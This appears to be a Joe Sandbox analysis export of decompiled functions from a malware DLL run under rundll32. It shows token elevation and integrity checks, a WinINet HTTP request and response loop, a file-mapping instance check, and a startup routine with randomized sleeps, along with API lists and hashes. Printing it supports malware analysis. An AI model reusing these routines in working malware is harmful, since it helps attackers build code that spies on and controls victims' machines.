                                • Opcode ID: 627ded8b904735eae4bb48f3d6951e5537d65d41276619ae4347143817ad2766
                                • Instruction ID: d4c7802aa08b69ee2cb9fb3a54c2e171d26cc442893927bd41750172e228f812
                                • Opcode Fuzzy Hash: 627ded8b904735eae4bb48f3d6951e5537d65d41276619ae4347143817ad2766
                                • Instruction Fuzzy Hash: 16311A71B11206EFE710EFA9EC84A6EB7F9EF84314B25446DE505D7290EB34EE059B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E04288E0D(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L0428AF68();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x428d2a8; // 0xaea5a8
                                				_t5 = _t13 + 0x428e87e; // 0x4d78e26
                                				_t6 = _t13 + 0x428e59c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L0428AC0A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x428d2ac, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04282FFF,?,?,4D283A53,?,?), ref: 04288E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04288E2F
                                • _snwprintf.NTDLL ref: 04288E54
                                • CreateFileMappingW.KERNELBASE(000000FF,0428D2AC,00000004,00000000,00001000,?), ref: 04288E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04282FFF,?,?,4D283A53), ref: 04288E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04288E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04282FFF,?,?), ref: 04288EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04282FFF,?,?,4D283A53), ref: 04288EC2
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 15c5198ddc86c59d75872fb78e8bbb6aa877362f485741a4ea97103ac44f5098
                                • Instruction ID: 862b2bbd9c9e6f714c434eb799764b6df8f4364790cca49bf68ae995c6b9509a
                                • Opcode Fuzzy Hash: 15c5198ddc86c59d75872fb78e8bbb6aa877362f485741a4ea97103ac44f5098
                                • Instruction Fuzzy Hash: 9721D572B22204FBE711BB68EC09F9E37A9EB44750F210129F605E71C0EB70E904CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E042858DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                				void* _t21;
                                				intOrPtr _t24;
                                				void* _t37;
                                				void* _t41;
                                				intOrPtr* _t45;
                                
                                				_t41 = __edi;
                                				_t37 = __ebx;
                                				_t45 = __eax;
                                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                					E042829C0(_t16, __ecx, 0xea60);
                                				}
                                				_t17 =  *(_t45 + 0x18);
                                				_push(_t37);
                                				_push(_t41);
                                				if(_t17 != 0) {
                                					InternetSetStatusCallback(_t17, 0);
                                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                				}
                                				_t18 =  *(_t45 + 0x14);
                                				if(_t18 != 0) {
                                					InternetSetStatusCallback(_t18, 0);
                                					InternetCloseHandle( *(_t45 + 0x14));
                                				}
                                				_t19 =  *(_t45 + 0x10);
                                				if(_t19 != 0) {
                                					InternetSetStatusCallback(_t19, 0);
                                					InternetCloseHandle( *(_t45 + 0x10));
                                				}
                                				_t20 =  *(_t45 + 0x1c);
                                				if(_t20 != 0) {
                                					CloseHandle(_t20);
                                				}
                                				_t21 =  *(_t45 + 0x20);
                                				if(_t21 != 0) {
                                					CloseHandle(_t21);
                                				}
                                				_t22 =  *((intOrPtr*)(_t45 + 8));
                                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                					E04288B22(_t22);
                                					 *((intOrPtr*)(_t45 + 8)) = 0;
                                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                				}
                                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                					E04288B22(_t23);
                                				}
                                				_t24 =  *_t45;
                                				if(_t24 != 0) {
                                					_t24 = E04288B22(_t24);
                                				}
                                				_t46 =  *((intOrPtr*)(_t45 + 4));
                                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                					return E04288B22(_t46);
                                				}
                                				return _t24;
                                			}

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04285909
                                • InternetCloseHandle.WININET(?), ref: 0428590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04285919
                                • InternetCloseHandle.WININET(?), ref: 0428591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04285929
                                • InternetCloseHandle.WININET(?), ref: 0428592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,042893DC,?,?,00000000,00000000,74E481D0), ref: 0428593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,042893DC,?,?,00000000,00000000,74E481D0), ref: 04285948
                                  • Part of subcall function 042829C0: WaitForMultipleObjects.KERNEL32(00000002,0428A923,00000000,0428A923,?,?,?,0428A923,0000EA60), ref: 042829DB
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: f8afa8e800311c4b20aa6523100188b32f3b7283954f1101a1bb0a2a50653a0c
                                • Instruction ID: d230561d8098b1ec5ef2f4070ac4071d2253d8384087d25a8faf57663069683d
                                • Opcode Fuzzy Hash: f8afa8e800311c4b20aa6523100188b32f3b7283954f1101a1bb0a2a50653a0c
                                • Instruction Fuzzy Hash: E7110076721649ABC630BEAAEC84C1FF7E9FF843243954D1DE096D3590C725FC888A64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

C-Code - Quality: 100%
Address     Decompiled code
            			E0428A2C6(long* _a4) {
            				long _v8;
            				void* _v12;
            				void _v16;
            				long _v20;
            				int _t33;
            				void* _t46;
            
0x0428a2d3  				_v16 = 1;
0x0428a2da  				_v20 = 0x2000; // default result: SECURITY_MANDATORY_MEDIUM_RID
0x0428a2e1  				if( *0x428d25c > 5) { // presumably a cached OS major version; token elevation only exists on Vista (6.x) and later
0x0428a2f5  					_v16 = 0;
0x0428a300  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // current process, TOKEN_READ
0x0428a318  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; 0x14 = TokenElevation, fills TOKEN_ELEVATION.TokenIsElevated
0x0428a325  						_v8 = 0;
0x0428a328  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; 0x19 = TokenIntegrityLevel, size query only
0x0428a32d  						if(_v8 != 0) {
0x0428a338  							_t46 = E04281525(_v8); // heap allocation (RtlAllocateHeap subcall, see APIs below)
0x0428a33c  							if(_t46 != 0) {
0x0428a34b  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed; TOKEN_MANDATORY_LABEL
0x0428a34f  								if(_t33 != 0) {
0x0428a36b  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff)); // last sub-authority of the label SID = mandatory level RID
0x0428a36b  								}
0x0428a36f  								E04288B22(_t46); // presumably frees the buffer
0x0428a36f  							}
0x0428a374  						}
0x0428a378  						CloseHandle(_v12);
0x0428a37e  					}
0x0428a37f  				}
0x0428a386  				 *_a4 = _v20; // out: integrity level RID
0x0428a38c  				return _v16; // nonzero when the token is elevated
            			}

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0428A2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 0428A318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0428A328
                                • CloseHandle.KERNEL32(00000000), ref: 0428A378
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 0428A34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0428A353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0428A363
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: ff2b8ce02f960a8b17e68e0a1bef96ec20e5881dd2a3d4fb76b2600dbc75b3af
                                • Instruction ID: aaf70f21571638f5735a9b71968992dcdf90f7805f3046c580c2b03c1285de6b
                                • Opcode Fuzzy Hash: ff2b8ce02f960a8b17e68e0a1bef96ec20e5881dd2a3d4fb76b2600dbc75b3af
                                • Instruction Fuzzy Hash: A2214F75A1121DFFEB00AFA4EC48EEEBB79FB44304F10006AE510A6191DB759E55EF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (text export of the graph: node id, basic-block address range, APIs called in the block, and edges as node->node)

                                control_flow_graph 223 4285988-428598f 224 428599a-428a574 ResetEvent InternetReadFile 223->224 225 4285991-4285998 call 42857dd 223->225 229 428a5a5-428a5aa 224->229 230 428a576-428a584 GetLastError 224->230 225->224 235 42859a2-42859a3 225->235 233 428a66d 229->233 234 428a5b0-428a5bf 229->234 231 428a59d-428a59f 230->231 232 428a586-428a594 call 42829c0 230->232 231->229 237 428a670-428a676 231->237 232->237 240 428a59a 232->240 233->237 241 428a668-428a66b 234->241 242 428a5c5-428a5d4 call 4281525 234->242 240->231 241->237 245 428a65a-428a65c 242->245 246 428a5da-428a5e2 242->246 248 428a65d-428a666 245->248 247 428a5e3-428a608 ResetEvent InternetReadFile 246->247 251 428a60a-428a618 GetLastError 247->251 252 428a631-428a636 247->252 248->237 253 428a61a-428a628 call 42829c0 251->253 254 428a641-428a64b call 4288b22 251->254 252->254 255 428a638-428a63f 252->255 253->254 260 428a62a-428a62f 253->260 254->248 261 428a64d-428a658 call 42848cb 254->261 255->247 260->252 260->254 261->248
C-Code - Quality: 71%
Address     Decompiled code
            			E04285988(void* __eax, void* __ecx) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				void _v20;
            				void* __esi;
            				void* _t30;
            				int _t34;
            				void* _t38;
            				intOrPtr* _t39;
            				intOrPtr* _t41;
            				int _t45;
            				void* _t54;
            				long _t64;
            				void* _t67;
            				void* _t69;
            
0x04285988  				_t58 = __ecx;
0x04285989  				_t67 = __eax;
0x0428598f  				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
0x0428599a  					L2:
0x0428599a  					_t30 = _t67;
0x0428599c  					_pop(_t68);
0x0428a556  					_t69 = _t30; // request context (inferred from usage): +0x18 request handle, +0x1c completion event, +0x28 status stored by the async path, +0x30 flag
0x0428a55b  					_t64 = 0;
0x0428a55d  					ResetEvent( *(_t69 + 0x1c));
0x0428a56c  					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed; 4-byte probe read
0x0428a574  					if(_t34 != 0) {
0x0428a5a5  						L9:
0x0428a5aa  						if(_v8 == 0) {
0x0428a66d  							 *((intOrPtr*)(_t69 + 0x30)) = 0; // nothing read: clear the flag
0x0428a5b0  						} else {
0x0428a5b7  							 *0x428d164(0, 1,  &_v12); // executed; call through a function pointer that yields an object with a vtable (slots +0x8 and +0x10 used below)
0x0428a5bf  							if(0 != 0) { // decompiler artifact: the return value of the call above is what is tested here
0x0428a66a  								_t64 = 8;
0x0428a5c5  							} else {
0x0428a5ca  								_t38 = E04281525(0x1000); // allocate a 0x1000-byte read buffer
0x0428a5cf  								_v16 = _t38;
0x0428a5d4  								if(_t38 == 0) {
0x0428a65c  									_t64 = 8;
0x0428a5da  								} else {
0x0428a5da  									_push(0);
0x0428a5dc  									_push(_v8);
0x0428a5e2  									_push( &_v20);
0x0428a5e3  									while(1) {
0x0428a5e3  										_t41 = _v12;
0x0428a5e6  										_t61 =  *_t41;
0x0428a5e9  										 *((intOrPtr*)( *_t41 + 0x10))(_t41); // vtable slot +0x10 receives the chunk pushed above (buffer, length, 0)
0x0428a5ef  										ResetEvent( *(_t69 + 0x1c));
0x0428a600  										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed; read the next chunk
0x0428a608  										if(_t45 != 0) {
0x00000000  											goto L17;
0x00000000  										}
0x0428a610  										_t64 = GetLastError();
0x0428a618  										if(_t64 == 0x3e5) { // ERROR_IO_PENDING: asynchronous read, wait for completion
0x0428a624  											_t64 = E042829C0( *(_t69 + 0x1c), _t61, 0xffffffff); // wait on the completion event, INFINITE timeout (WaitForMultipleObjects subcall)
0x0428a628  											if(_t64 == 0) {
0x0428a62a  												_t64 =  *((intOrPtr*)(_t69 + 0x28)); // status recorded by the async completion
0x0428a62f  												if(_t64 == 0) {
0x00000000  													goto L17;
0x00000000  												}
0x0428a62f  											}
0x0428a628  										}
0x0428a641  										L19:
0x0428a644  										E04288B22(_v16); // release the read buffer
0x0428a64b  										if(_t64 == 0) {
0x0428a656  											_t64 = E042848CB(_v12, _t69); // presumably processes the fully received body
0x0428a656  										}
0x00000000  										goto L22;
0x0428a631  										L17:
0x0428a631  										_t64 = 0;
0x0428a636  										if(_v8 != 0) {
0x0428a638  											_push(0);
0x0428a639  											_push(_v8);
0x0428a63c  											_push(_v16);
0x00000000  											continue; // more data: hand the chunk to the object and read again
0x0428a63c  										}
0x00000000  										goto L19; // zero bytes read: end of response
0x0428a636  									}
0x0428a5e3  								}
0x0428a65d  								L22:
0x0428a65d  								_t39 = _v12;
0x0428a663  								 *((intOrPtr*)( *_t39 + 8))(_t39); // vtable slot +0x8, presumably releases the object
0x0428a663  							}
0x0428a5bf  						}
0x0428a576  					} else {
0x0428a57c  						_t64 = GetLastError();
0x0428a584  						if(_t64 != 0x3e5) {
0x0428a59d  							L8:
0x0428a59f  							if(_t64 == 0) {
0x00000000  								goto L9;
0x00000000  							}
0x0428a586  						} else { // ERROR_IO_PENDING on the probe read: wait, then take the recorded status
0x0428a590  							_t64 = E042829C0( *(_t69 + 0x1c), _t58, 0xffffffff);
0x0428a594  							if(_t64 == 0) {
0x0428a59a  								_t64 =  *((intOrPtr*)(_t69 + 0x28));
0x00000000  								goto L8;
0x0428a59a  							}
0x0428a594  						}
0x0428a584  					}
0x0428a676  					return _t64;
0x04285991  				} else {
0x04285991  					_t54 = E042857DD(__ecx, __eax); // response headers first (HttpQueryInfoA subcalls listed below)
0x04285998  					if(_t54 != 0) {
0x042859a3  						return _t54;
0x00000000  					} else {
0x00000000  						goto L2;
0x00000000  					}
0x04285998  				}
            			}

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 0428A55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 0428A56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 0428A576
                                • ResetEvent.KERNEL32(?), ref: 0428A5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 0428A600
                                • GetLastError.KERNEL32 ref: 0428A60A
                                  • Part of subcall function 042857DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 042857F4
                                  • Part of subcall function 042857DD: SetEvent.KERNEL32(?), ref: 04285804
                                  • Part of subcall function 042857DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04285836
                                  • Part of subcall function 042857DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428585B
                                  • Part of subcall function 042857DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428587B
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: e4fc1574084abe74399a433c441c59083685aa285e133c9b2e7cdf827d1d8477
                                • Instruction ID: ef5e85bb35cb2680fd19b20e5b9268a56af0f4022311f69ab2ed69bdb396239b
                                • Opcode Fuzzy Hash: e4fc1574084abe74399a433c441c59083685aa285e133c9b2e7cdf827d1d8477
                                • Instruction Fuzzy Hash: A941D232B22611EBDF21BEA9DC44A6E73B9AF843A0F10056EE512D71D0EB70F9418B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

C-Code - Quality: 74%
Address     Decompiled code
            			E04282789(void* __ecx, void* __edx, intOrPtr _a4) {
            				struct _FILETIME _v12;
            				void* _t10;
            				void* _t12;
            				int _t14;
            				signed int _t16;
            				void* _t18;
            				signed int _t19;
            				unsigned int _t23;
            				void* _t27;
            				signed int _t34;
            
0x04282789  				_t27 = __edx;
0x0428278f  				_push(__ecx);
0x04282790  				_push(__ecx);
0x0428279c  				_t10 = HeapCreate(0, 0x400000, 0); // executed; private growable heap, 4 MiB initial size
0x042827a2  				 *0x428d238 = _t10;
0x042827a9  				if(_t10 != 0) {
0x042827b9  					 *0x428d1a8 = GetTickCount(); // start timestamp
0x042827be  					_t12 = E04289EBB(_a4);
0x042827c5  					if(_t12 == 0) {
0x042827c7  						do {
0x042827cc  							GetSystemTimeAsFileTime( &_v12);
0x042827d2  							_t14 = SwitchToThread();
0x042827d8  							_t23 = _v12.dwHighDateTime;
0x042827e2  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5; // 64-bit FILETIME >> 5 (the decompiler renders the 64-bit shift this way)
0x042827e6  							_push(0);
0x042827e8  							_push(0x13);
0x042827ed  							_push(_t23 >> 5);
0x042827ee  							_push(_t16);
0x042827ef  							L0428B0CA(); // _aullrem: unsigned 64-bit modulo of the shifted time by 0x13
0x042827f4  							_t34 = _t14 + _t16;
0x042827fa  							_t18 = E0428122B(_a4, _t34);
0x04282805  							_t19 = 3;
0x04282806  							_t26 = _t34 & 0x00000007;
0x0428280c  							Sleep(_t19 << (_t34 & 0x00000007)); // executed; 3 << (0..7) = 3 to 384 ms per iteration
0x04282812  						} while (_t18 == 1); // retry loop while E0428122B reports 1
0x0428281e  						if(E04284D4D(_t26) != 0) {
0x04282820  							 *0x428d260 = 1; // executed
0x04282820  						}
0x0428282a  						_t12 = E04282F70(_t27); // executed
0x0428282a  					}
0x042827ab  				} else {
0x042827ad  					_t12 = 8; // HeapCreate failed
0x042827ad  				}
0x04282834  				return _t12;
            			}

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04287F25,?), ref: 0428279C
                                • GetTickCount.KERNEL32 ref: 042827B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04287F25,?), ref: 042827CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 042827D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 042827EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04287F25,?), ref: 0428280C
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: cde83a7ebe1a3f2578f25797fcd8965eecf8a6c1a38e0d4d35f357b4a7f9c2ae
                                • Instruction ID: cbbfe2e425e049d3e6f50f68b90d770ddb068217aeb39cfadc2a61fc4ce02abb
                                • Opcode Fuzzy Hash: cde83a7ebe1a3f2578f25797fcd8965eecf8a6c1a38e0d4d35f357b4a7f9c2ae
                                • Instruction Fuzzy Hash: 9711A072B66205ABE7147BA9FC1DB6E76A8DB44394F00412DF905D72C4EBB4EC408671
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph (text export of the graph: node id, basic-block address range, APIs called in the block, and edges as node->node)

                                control_flow_graph 279 42897f7-4289806 280 4289808-4289818 call 4288cfa 279->280 281 428981a-4289825 call 428a85c 279->281 280->281 286 4289869 GetLastError 280->286 287 4289864-4289867 281->287 288 4289827-428984c ResetEvent * 2 HttpSendRequestA 281->288 291 428986b-428986d 286->291 287->286 287->291 289 4289859-428985c SetEvent 288->289 290 428984e-4289855 GetLastError 288->290 293 4289862 289->293 290->287 292 4289857 290->292 292->293 293->287
C-Code - Quality: 100%
Address     Decompiled code
            			E042897F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
            				void* __esi;
            				long _t10;
            				int _t14;
            				void* _t18;
            				void* _t22;
            
0x042897f7  				_t9 = __eax;
0x04289804  				_t22 = __eax;
0x04289806  				if(_a4 != 0 && E04288CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) { // copies the caller-supplied string into the context (lstrlen/memcpy/lstrcpy subcalls below)
0x04289869  					L9:
0x00000000  					return GetLastError();
0x04289869  				}
0x0428981e  				_t10 = E0428A85C(_t9, _t18, _t22, _a8); // executed
0x04289825  				if(_t10 == 0) {
0x04289831  					ResetEvent( *(_t22 + 0x1c));
0x04289836  					ResetEvent( *(_t22 + 0x20));
0x04289843  					_t14 = HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0); // executed; request handle at +0x18, no extra headers, no body
0x0428984c  					if(_t14 != 0) {
0x0428985c  						SetEvent( *(_t22 + 0x1c)); // completed synchronously: signal the event the reader waits on
0x00000000  						goto L7;
0x0428984e  					} else {
0x0428984e  						_t10 = GetLastError();
0x04289855  						if(_t10 == 0x3e5) { // ERROR_IO_PENDING: asynchronous send still in flight, treated as success
0x04289862  							L7:
0x04289862  							_t10 = 0;
0x04289862  						}
0x04289855  					}
0x0428984c  				}
0x04289867  				if(_t10 == 0xffffffff) {
0x00000000  					goto L9;
0x00000000  				}
0x0428986d  				return _t10;
            			}

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,0428937B,?,?,00000000,00000000), ref: 04289831
                                • ResetEvent.KERNEL32(?), ref: 04289836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04289843
                                • GetLastError.KERNEL32 ref: 0428984E
                                • GetLastError.KERNEL32(?,?,00000102,0428937B,?,?,00000000,00000000), ref: 04289869
                                  • Part of subcall function 04288CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04289816,?,?,?,?,00000102,0428937B,?,?,00000000), ref: 04288D06
                                  • Part of subcall function 04288CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04289816,?,?,?,?,00000102,0428937B,?), ref: 04288D64
                                  • Part of subcall function 04288CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 04288D74
                                • SetEvent.KERNEL32(?), ref: 0428985C
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: e844a6437fda9e25d29e340f8f4a0acd2052810cb11a940192684c870818e405
                                • Instruction ID: f538f3c1cf78ce237902e7bacbd95b566e6682f14139b682117fcc0c73531962
                                • Opcode Fuzzy Hash: e844a6437fda9e25d29e340f8f4a0acd2052810cb11a940192684c870818e405
                                • Instruction Fuzzy Hash: 33018F71322206AAD7317B36EC48F2FB6A8EF44364F10062DE551950E0D721E844DE60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 4281128-4281137 RtlEnterCriticalSection 295 4281141-428114b 294->295 296 4281139-428113b Sleep 295->296 297 428114d-4281151 295->297 296->295 298 4281169-428116e call 4284a2a 297->298 299 4281153-4281158 297->299 302 4281173-4281185 RtlLeaveCriticalSection 298->302 299->298 300 428115a-428115d 299->300 300->298
                                C-Code - Quality: 50%
                                			E04281128(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				void* _t9;
                                				intOrPtr _t10;
                                				void* _t11;
                                				void** _t13;
                                
                                				_t13 = __esi;
                                				_t4 =  *0x428d32c; // 0x4d795b0
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x428d32c; // 0x4d795b0
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t13;
                                				if(_t8 != 0 && _t8 != 0x428d030) {
                                					HeapFree( *0x428d238, 0, _t8);
                                				}
                                				_t9 = E04284A2A(_v0, _t13); // executed
                                				_t13[1] = _t9;
                                				_t10 =  *0x428d32c; // 0x4d795b0
                                				_t11 = _t10 + 0x40;
                                				__imp__(_t11);
                                				return _t11;
                                			}












                                APIs
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04281131
                                • Sleep.KERNEL32(0000000A,?,042830F3), ref: 0428113B
                                • HeapFree.KERNEL32(00000000,00000000,?,042830F3), ref: 04281163
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 0428117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
